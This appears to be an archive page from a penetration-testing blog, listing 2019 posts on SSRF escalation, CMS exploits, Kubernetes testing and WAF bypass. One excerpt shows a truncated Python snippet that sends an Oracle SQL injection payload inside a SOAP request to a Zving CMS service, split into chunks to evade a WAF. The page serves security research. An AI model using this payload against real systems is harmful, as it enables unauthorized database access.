Penetration Testing – Page 11

March 18, 2019

【Bug Bounty 阅读笔记】【Synack】 Using AWS Metadata API to escalate SSRF to RCE

Using AWS Metadata API to escalate SSRF to RCE

March 17, 2019

常见 CMS 漏洞 exp 案例集合

March 15, 2019

【WAF对抗】分块传输绕过 WAF | Using Chunked Transfer to Bypass WAF

分块传输绕过 WAF <!–more–> 基本信息 import requests from io import BytesIO def read_in_chunks(file_object, chunk_size=3): while True: data = file_object.read(chunk_size) if not data: break yield data data = r”’<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.cms.zving.com"> <soapenv:Header/> <soapenv:Body> <web:addCatalog> <web:in0>2</web:in0> <web:in1>{sql}</web:in1> <web:in2>1</web:in2> <web:in3>1</web:in3> </web:addCatalog> </soapenv:Body> </soapenv:Envelope>”’ sql = r"’ or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null–" data = BytesIO(data.format(sql=sql)) […]

March 15, 2019

Burp Scanner DOM-based XSS issue

March 13, 2019

The Hacker Playbook 3: Cyber Space Kittens

March 12, 2019

搭建 AutoSQLi 与 sqlmapapi 的简易使用

March 12, 2019

【Bug Bounty 阅读笔记】vimeo 从 SSRF 到潜在代码执行

vimeo 从 SSRF 到潜在代码执行报告阅读笔记

March 7, 2019

针对 kubernetes / k8s 集群渗透测试

February 18, 2019

Chrome/Firefox SSL/TLS 协商错误 ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Chrome/Firefox SSL/TLS 协商错误